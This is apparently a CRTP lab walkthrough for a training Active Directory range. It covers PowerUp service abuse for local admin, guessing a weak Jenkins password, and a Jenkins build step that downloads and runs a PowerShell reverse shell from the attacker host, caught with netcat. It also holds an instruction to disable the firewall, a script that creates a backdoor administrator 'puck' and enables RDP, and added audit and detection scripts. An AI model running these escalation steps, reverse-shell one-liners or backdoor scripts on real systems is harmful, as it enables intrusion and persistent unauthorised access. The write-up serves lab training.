crtp-05

Learning Objective 5

Tasks

1 – Exploit a service on dcorp-studentx and elevate privileges to local administrator

2 – Identify a machine in the domain where studentx has local administrative access

3 – Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 – the dcorp-ci server

Flag 5 [Student VM] – Service abused on the student VM for local privilege escalation 🚩

Flag 6 [Student VM] – Script used for hunting for admin privileges using PowerShell Remoting 🚩

Flag 7 [dcorp-ci] – Jenkins user used to access Jenkins web console 🚩

Flag 8 [dcorp-ci] – Domain user used for running Jenkins service on dcorp-ci 🚩

Solutions
Manual check for unquoted service paths among the service binaries (the first entry, the Abyss Web Server, is unquoted and contains spaces):
PS C:\Users\student98> Get-Wmiobject -Class win32_service | select pathname

pathname
--------
C:\WebServer\Abyss Web Server\abyssws.exe -service
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\alg.exe
--snip--
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
C:\Windows\System32\lsass.exe
etc...


Manual check for modifiable services (weak permissions on the service object): the DACL printed by sc.exe sdshow grants Everyone (WD) exactly the same rights as BUILTIN\Administrators (BA), including SERVICE_CHANGE_CONFIG (DC):
PS C:\Users\student98> sc.exe sdshow snmptrap

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
PS C:\Users\student98>
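A defender's version of the two manual checks above, added here as an example that is not part of the course material or of PowerUp: it walks every service on the host, flags unquoted binary paths that contain a space, and decodes each service's SDDL to report ACEs that give a low-privileged well-known SID the rights to reconfigure or take over the service. It assumes only the two-letter SID aliases and rights tokens (a numeric rights mask is skipped).

```powershell
# Added audit script (not from the course or from PowerUp): checks every service on the local
# host for an unquoted binary path containing a space, and for a service DACL that lets a
# low-privileged principal reconfigure or take over the service. A standard user suffices:
# Win32_Service and "sc.exe sdshow" are readable without administrative rights.

# SDDL rights tokens on a service object that allow changing its binary path or its DACL.
$DangerousRights = @{ 'DC' = 'SERVICE_CHANGE_CONFIG'; 'WD' = 'WRITE_DAC'; 'WO' = 'WRITE_OWNER';
                      'GA' = 'GENERIC_ALL'; 'GW' = 'GENERIC_WRITE' }
# Well-known SID aliases that every ordinary user sits behind.
$LowPrivSids = @{ 'WD' = 'Everyone'; 'BU' = 'BUILTIN\Users'; 'AU' = 'Authenticated Users'; 'IU' = 'INTERACTIVE' }

function Test-UnquotedServicePath {
    param([Parameter(Mandatory)][string]$PathName)
    # Drop the arguments: everything from the first " -" or " /" switch onwards.
    $exe = ($PathName -split ' [-/]', 2)[0].Trim()
    # The SCM only gets ambiguous when the path is unquoted AND contains a space.
    return (-not $PathName.StartsWith('"')) -and ($exe -match ' ')
}

function Get-WeakServiceAce {
    param([AllowEmptyString()][string]$Sddl)
    # A DACL ACE is (A;<flags>;<rights>;<objguid>;<inhguid>;<trustee>); the trustee may be a
    # two-letter alias (WD, BU, ...) or a full S-1-... SID; only the aliases are checked here.
    foreach ($m in [regex]::Matches($Sddl, '\(A;[^;]*;([^;]*);[^;]*;[^;]*;([^)]*)\)')) {
        $rights  = $m.Groups[1].Value
        $trustee = $m.Groups[2].Value
        if (-not $LowPrivSids.ContainsKey($trustee)) { continue }
        if ($rights -match '^0x') { continue }   # numeric access masks are not decoded here
        # Rights are concatenated two-letter tokens; split into pairs and keep the dangerous ones.
        $pairs = for ($i = 0; $i + 1 -lt $rights.Length; $i += 2) { $rights.Substring($i, 2) }
        $bad = @($pairs | Where-Object { $DangerousRights.ContainsKey($_) })
        if ($bad.Count -gt 0) {
            [pscustomobject]@{
                Trustee = $LowPrivSids[$trustee]
                Rights  = ($bad | ForEach-Object { $DangerousRights[$_] }) -join ','
            }
        }
    }
}

# One pass over all services: report unquoted paths and weak DACLs.
foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    if ($svc.PathName -and (Test-UnquotedServicePath $svc.PathName)) {
        "[UNQUOTED]  $($svc.Name): $($svc.PathName)"
    }
    # sc.exe sdshow prints a blank line followed by the SDDL string starting with "D:".
    $sddl = (& sc.exe sdshow $svc.Name | Where-Object { $_ -match '^D:' }) -join ''
    foreach ($ace in Get-WeakServiceAce $sddl) {
        "[WEAK-DACL] $($svc.Name): $($ace.Trustee) has $($ace.Rights)"
    }
}
```

On the SDDL shown above for snmptrap, the second function reports Everyone with SERVICE_CHANGE_CONFIG, WRITE_DAC and WRITE_OWNER, which is exactly the condition PowerUp later lists as "Modifiable Services".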


1 – Exploit a service on dcorp-studentx and elevate privileges to local administrator

Start InviShell and PowerUp

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\PowerUp.ps1

Now we need to exploit a service and elevate privileges to local administrator. Using the Invoke-AllChecks function we can list every vulnerable service (“CanRestart: True”, “Check: Modifiable Services”, “Unquoted Service Paths”) together with the abuse function that exploits each of them:

Invoke-AllChecks

ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True
Name           : AbyssWebServer
Check          : Unquoted Service Paths

ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True
Name           : AbyssWebServer
Check          : Unquoted Service Paths

ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True
Name           : AbyssWebServer
Check          : Unquoted Service Paths

ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True
Name           : AbyssWebServer
Check          : Unquoted Service Paths

ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer\Abyss Web Server\abyssws.exe; IdentityReference=Everyone; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True
Name           : AbyssWebServer
Check          : Unquoted Service Paths

ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer\Abyss Web Server; IdentityReference=Everyone; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True
Name           : AbyssWebServer
Check          : Unquoted Service Paths

ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer\Abyss Web Server; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True
Name           : AbyssWebServer
Check          : Unquoted Service Paths

ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer\Abyss Web Server; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True
Name           : AbyssWebServer
Check          : Unquoted Service Paths

ServiceName                     : AbyssWebServer
Path                            : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile                  : C:\WebServer\Abyss Web Server
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : Everyone
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart                      : True
Name                            : AbyssWebServer
Check                           : Modifiable Service Files

ServiceName                     : AbyssWebServer
Path                            : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile                  : C:\WebServer\Abyss Web Server
ModifiableFilePermissions       : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart                      : True
Name                            : AbyssWebServer
Check                           : Modifiable Service Files

ServiceName                     : AbyssWebServer
Path                            : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile                  : C:\WebServer\Abyss Web Server
ModifiableFilePermissions       : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart                      : True
Name                            : AbyssWebServer
Check                           : Modifiable Service Files

ServiceName                     : edgeupdate
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'
CanRestart                      : False
Name                            : edgeupdate
Check                           : Modifiable Service Files

ServiceName                     : edgeupdate
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'
CanRestart                      : False
Name                            : edgeupdate
Check                           : Modifiable Service Files

ServiceName                     : edgeupdatem
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart                      : False
Name                            : edgeupdatem
Check                           : Modifiable Service Files

ServiceName                     : edgeupdatem
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart                      : False
Name                            : edgeupdatem
Check                           : Modifiable Service Files

ServiceName   : AbyssWebServer
Path          : C:\WebServer\Abyss Web Server\abyssws.exe -service
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'AbyssWebServer'
CanRestart    : True
Name          : AbyssWebServer
Check         : Modifiable Services

ServiceName   : SNMPTRAP
Path          : C:\Windows\System32\snmptrap.exe
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart    : True
Name          : SNMPTRAP
Check         : Modifiable Services

ModifiablePath    : C:\Users\student867\AppData\Local\Microsoft\WindowsApps
IdentityReference : dcorp\student867
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\student867\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\student867\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\student867\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

There are multiple vulnerable services; in this case I chose one whose CanRestart attribute equals ‘True’:

ServiceName   : SNMPTRAP
Path          : C:\Windows\System32\snmptrap.exe
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart    : True
Name          : SNMPTRAP
Check         : Modifiable Services

Abusing it with the following command, we can escalate privileges by adding our student account to the local Administrators group.

To do it correctly, first check the abuse function's examples:

help Invoke-ServiceAbuse -Example

NAME
    Invoke-ServiceAbuse

SYNOPSIS
    Abuses a function the current user has configuration rights on in order
    to add a local administrator or execute a custom command.

    Author: Will Schroeder (@harmj0y)
    License: BSD 3-Clause
    Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath


    -------------------------- EXAMPLE 1 --------------------------

    PS C:\>Invoke-ServiceAbuse -Name VulnSVC

    Abuses service 'VulnSVC' to add a localuser "john" with password
    "Password123! to the  machine and local administrator group


    -------------------------- EXAMPLE 2 --------------------------

    PS C:\>Get-Service VulnSVC | Invoke-ServiceAbuse

    Abuses service 'VulnSVC' to add a localuser "john" with password
    "Password123! to the  machine and local administrator group


    -------------------------- EXAMPLE 3 --------------------------

    PS C:\>Invoke-ServiceAbuse -Name VulnSVC -UserName "TESTLAB\john"

    Abuses service 'VulnSVC' to add a the domain user TESTLAB\john to the
    local adminisrtators group.


    -------------------------- EXAMPLE 4 --------------------------

    PS C:\>Invoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup "Power Users"

    Abuses service 'VulnSVC' to add a localuser "backdoor" with password
    "password" to the  machine and local "Power Users" group

So, this is the abuse function that we need:

Invoke-ServiceAbuse -Name 'SNMPTRAP' -UserName "dcorp\student867" -Verbose

Check it with Get-LocalGroupMember -Group "Administrators":

ObjectClass Name                       PrincipalSource
----------- ----                       ---------------
Group       dcorp\Domain Admins        ActiveDirectory
User        dcorp\student867           ActiveDirectory
User        DCORP-STD867\Administrator Local
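The other side of this abuse, as an added example that is not course material: a PowerShell query that correlates the event-log trail left on the student VM when a service's binary path is pointed at a one-shot command and the service is restarted. It assumes English event message text, that the Service Control Manager is the provider for System 7000/7009, and that "Audit Security Group Management" is enabled so that 4732 is logged.

```powershell
# Added detection script (not part of the course material): looks for the trail the abuse above
# leaves behind. Pointing a service's binary path at a one-shot command makes the SCM log a start
# timeout (System 7009) and a start failure (System 7000) because the command never registers as a
# service, while the group change itself is Security 4732. Run from an elevated prompt: reading
# the Security log requires administrative rights.
param([int]$LookBackHours = 24, [int]$WindowSeconds = 120)
$since = (Get-Date).AddHours(-$LookBackHours)

# Read a named EventData field from the event XML instead of relying on property positions.
function Get-EventField {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    return ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

# 7000: "The <display name> service failed to start due to the following error: ..."
# 7009: "A timeout was reached (30000 milliseconds) while waiting for the <display name> service to connect."
# The service display name is pulled from the (English) message text.
$scmEvents = Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
    LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7000, 7009; StartTime = $since }
$failedStarts = foreach ($e in $scmEvents) {
    if ($e.Message -match '^The (.+?) service failed to start' -or
        $e.Message -match 'waiting for the (.+?) service to connect') {
        [pscustomobject]@{ Time = $e.TimeCreated; Id = $e.Id; Service = $Matches[1] }
    }
}

# 4732: "A member was added to a security-enabled local group."
$groupEvents = Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
    LogName = 'Security'; Id = 4732; StartTime = $since }
$hits = foreach ($g in $groupEvents) {
    # Only the local Administrators group matters for the escalation shown above.
    if ((Get-EventField $g 'TargetUserName') -ne 'Administrators') { continue }
    # A service start failure within the window around the group change is the tell-tale pair.
    $nearby = @($failedStarts | Where-Object {
        [math]::Abs(($g.TimeCreated - $_.Time).TotalSeconds) -le $WindowSeconds })
    [pscustomobject]@{
        Time           = $g.TimeCreated
        MemberSid      = Get-EventField $g 'MemberSid'
        AddedBy        = Get-EventField $g 'SubjectUserName'
        FailedServices = ($nearby | ForEach-Object { $_.Service } | Sort-Object -Unique) -join ','
        Suspicious     = $nearby.Count -gt 0
    }
}
$hits | Sort-Object Time | Format-Table -AutoSize
```

A 4732 for the Administrators group with a service start failure in the same window is the pattern to alert on; a 4732 alone may be legitimate administration.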

2 – Identify a machine in the domain where studentx has local administrative access

Using Find-PSRemotingLocalAdminAccess.ps1 we can display the machines where our student account has local admin access:

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Verbose

dcorp-adminsrv
dcorp-std867

3 – Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 – the dcorp-ci server

Go via browser to the Jenkins site (172.16.3.11:8080) Dashboard:

This Jenkins instance has no restrictive password policy, and we can obtain the usernames of three accounts by going to http://172.16.3.11:8080/asynchPeople/

manager
builduser
jenkinsadmin

so we could brute-force the accounts using Hydra, but before that I tried logging in at http://172.16.3.11:8080/login using the username itself and a few generic passwords as the password; the login with builduser:builduser credentials worked.

  • Modify an existing project, clicking to existing project0

  • Configure -> Add build step (write the following command) -> powershell iex (iwr -UseBasicParsing http://<attacker_machine>/Invoke-PowershellTcp.ps1);power -Reverse -IPAddress <attacker_machine> -Port 1339

powershell.exe iex (iwr http://172.16.100.98/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.98 -Port 1339

and save it. Meanwhile, run netcat on our attacker Windows machine in listening mode on port 1339:

C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 1339

Now that our student user belongs to the Administrators group, we can disable the firewall; do it!

After that, run a web server with HFS.exe from the Tools folder, add Invoke-PowerShellTcp.ps1 to its Virtual File System and copy the file's URL, which HFS puts on the clipboard:

Click on Build Now:

powershell.exe iex (iwr http://172.16.100.98/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.98 -Port 1339


Go back to our listener and we'll see the connection back:

c:\ProgramData>C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 1339
listening on [any] 1339 ...
172.16.3.11: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [172.16.100.98] from (UNKNOWN) [172.16.3.11] 57359: NO_DATA
Windows PowerShell running as user ciadmin on DCORP-CI
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator\.jenkins\workspace\Project13>hostname
dcorp-ci
PS C:\Users\Administrator\.jenkins\workspace\Project13> whoami /all

USER INFORMATION
----------------

User Name     SID
============= =============================================
dcorp\ciadmin S-1-5-21-719815819-3726368948-3917688648-1121

So we now have a shell on dcorp-ci (172.16.3.11). List the environment variables:

ls env:

Name                           Value
----                           -----
ALLUSERSPROFILE                C:\ProgramData
APPDATA                        C:\Users\ciadmin\AppData\Roaming
BASE                           C:\Users\Administrator\.jenkins
BUILD_DISPLAY_NAME             #3
BUILD_ID                       3
BUILD_NUMBER                   3
BUILD_TAG                      jenkins-Project0-3
BUILD_URL                      http://172.16.3.11:8080/job/Project0/3/
CI                             true
CommonProgramFiles             C:\Program Files\Common Files
CommonProgramFiles(x86)        C:\Program Files (x86)\Common Files
CommonProgramW6432             C:\Program Files\Common Files
COMPUTERNAME                   DCORP-CI
ComSpec                        C:\Windows\system32\cmd.exe
DriverData                     C:\Windows\System32\Drivers\DriverData
EXECUTOR_NUMBER                4
HUDSON_COOKIE                  667e6811-a108-4927-b6e0-07ded5dff4f3
HUDSON_HOME                    C:\Users\Administrator\.jenkins
HUDSON_SERVER_COOKIE           6f6749723e1110b6
HUDSON_URL                     http://172.16.3.11:8080/
JENKINS_HOME                   C:\Users\Administrator\.jenkins
JENKINS_SERVER_COOKIE          6f6749723e1110b6
JENKINS_URL                    http://172.16.3.11:8080/
JOB_BASE_NAME                  Project0
JOB_NAME                       Project0
JOB_URL                        http://172.16.3.11:8080/job/Project0/
LOCALAPPDATA                   C:\Users\ciadmin\AppData\Local
NODE_LABELS                    built-in
NODE_NAME                      built-in
NUMBER_OF_PROCESSORS           2
OS                             Windows_NT
Path                           C:\Program Files\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\...
PATHEXT                        .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PROCESSOR_ARCHITECTURE         AMD64
PROCESSOR_IDENTIFIER           AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_LEVEL                25
PROCESSOR_REVISION             0101
ProgramData                    C:\ProgramData
ProgramFiles                   C:\Program Files
ProgramFiles(x86)              C:\Program Files (x86)
ProgramW6432                   C:\Program Files
PROMPT                         $P$G
PSModulePath                   C:\Users\ciadmin\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShe...
PUBLIC                         C:\Users\Public
SERVICE_ID                     jenkins
SystemDrive                    C:
SystemRoot                     C:\Windows
TEMP                           C:\Users\ciadmin\AppData\Local\Temp
TMP                            C:\Users\ciadmin\AppData\Local\Temp
USERDNSDOMAIN                  DOLLARCORP.MONEYCORP.LOCAL
USERDOMAIN                     dcorp
USERNAME                       ciadmin
USERPROFILE                    C:\Users\ciadmin
windir                         C:\Windows
WINSW_EXECUTABLE               C:\Users\Administrator\.jenkins\jenkins.exe
WINSW_SERVICE_ID               jenkins
WORKSPACE                      C:\Users\Administrator\.jenkins\workspace\Project0
WORKSPACE_TMP                  C:\Users\Administrator\.jenkins\workspace\Project0@tmp

Flag 5 [Student VM] – Service abused on the student VM for local privilege escalation 🚩

As seen in task 1, we can use one of the following services:

ServiceName   : AbyssWebServer
Path          : C:\WebServer\Abyss Web Server\abyssws.exe -service
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'AbyssWebServer'
CanRestart    : True
Name          : AbyssWebServer
Check         : Modifiable Services

ServiceName   : SNMPTRAP
Path          : C:\Windows\System32\snmptrap.exe
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart    : True
Name          : SNMPTRAP
Check         : Modifiable Services

Flag 6 [Student VM] – Script used for hunting for admin privileges using PowerShell Remoting 🚩

As seen in task 2, we used Find-XXXXXXXXXXXX to hunt for admin privileges using PS Remoting:

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Verbose

Flag 7 [dcorp-ci] – Jenkins user used to access Jenkins web console 🚩

Based on task 3, we can log in with the XXXXXXX account:

Flag 8 [dcorp-ci] – Domain user used for running Jenkins service on dcorp-ci 🚩

As seen in task 3, after getting the reverse shell we checked the target's information; the domain user running the Jenkins service is XXXXXXX.

Personal note: first test the reverse shell from a DOS prompt on the StudentXX machine:

powershell iex (iwr -UseBasicParsing http://172.16.99.98:8000/Invoke-PowershellTcp.ps1);power -Reverse -IPAddress 172.16.99.98 -Port 1339

and catch the shell:

D:\CRTP>nc64.exe -nlvp 1339
listening on [any] 1339 ...
connect to [172.16.99.98] from (UNKNOWN) [172.16.100.98] 61521
Windows PowerShell running as user student98 on DCORP-STD98
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
dcorp\student98
PS C:\Windows\system32>


Extra: RDP access on the target, using the following script:

# Define the password for the new local user
$Password = "Start123!"

# Create the user 'puck' with the specified password
Write-Host "Creating user 'puck'..."
try {
    New-LocalUser -Name "puck" -Password (ConvertTo-SecureString $Password -AsPlainText -Force) -FullName "pwned User" -Description "Automatically created user" -ErrorAction Stop
    Write-Host "User 'puck' has been created."
} catch {
    Write-Host "User 'puck' already exists or an error occurred."
}

# Add the user 'puck' to the local Administrators group
Write-Host "Adding user 'puck' to the Administrators group..."
try {
    Add-LocalGroupMember -Group "Administrators" -Member "puck" -ErrorAction Stop
    Write-Host "User 'puck' has been added to the Administrators group."
} catch {
    Write-Host "User 'puck' is already a member of the Administrators group or an error occurred."
}

# Enable Remote Desktop (fDenyTSConnections = 0 allows incoming RDP connections)
Write-Host "Enabling Remote Desktop..."
try {
    Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0 -ErrorAction Stop
    Write-Host "Remote Desktop has been enabled."
} catch {
    Write-Host "Failed to enable Remote Desktop or it is already enabled."
}

# Check whether a firewall rule for RDP (TCP 3389 inbound) already exists
$rdpRule = Get-NetFirewallRule -DisplayName "Remote Desktop" -ErrorAction SilentlyContinue

if ($rdpRule) {
    Write-Host "Firewall rule 'Remote Desktop' already exists. Skipping creation."
} else {
    Write-Host "Creating firewall rule for Remote Desktop..."
    try {
        New-NetFirewallRule -Name "RDP Rule" -DisplayName "Remote Desktop" -Protocol TCP -LocalPort 3389 -Action Allow -Direction Inbound -ErrorAction Stop
        Write-Host "Firewall rule for Remote Desktop has been created."
    } catch {
        Write-Host "An error occurred while creating the firewall rule for Remote Desktop."
    }
}

# Notify the user that all tasks have been completed
Write-Host "All tasks completed successfully."


but it is a Server 2022 Core install, so there is no GUI, though a PowerShell command line is available.
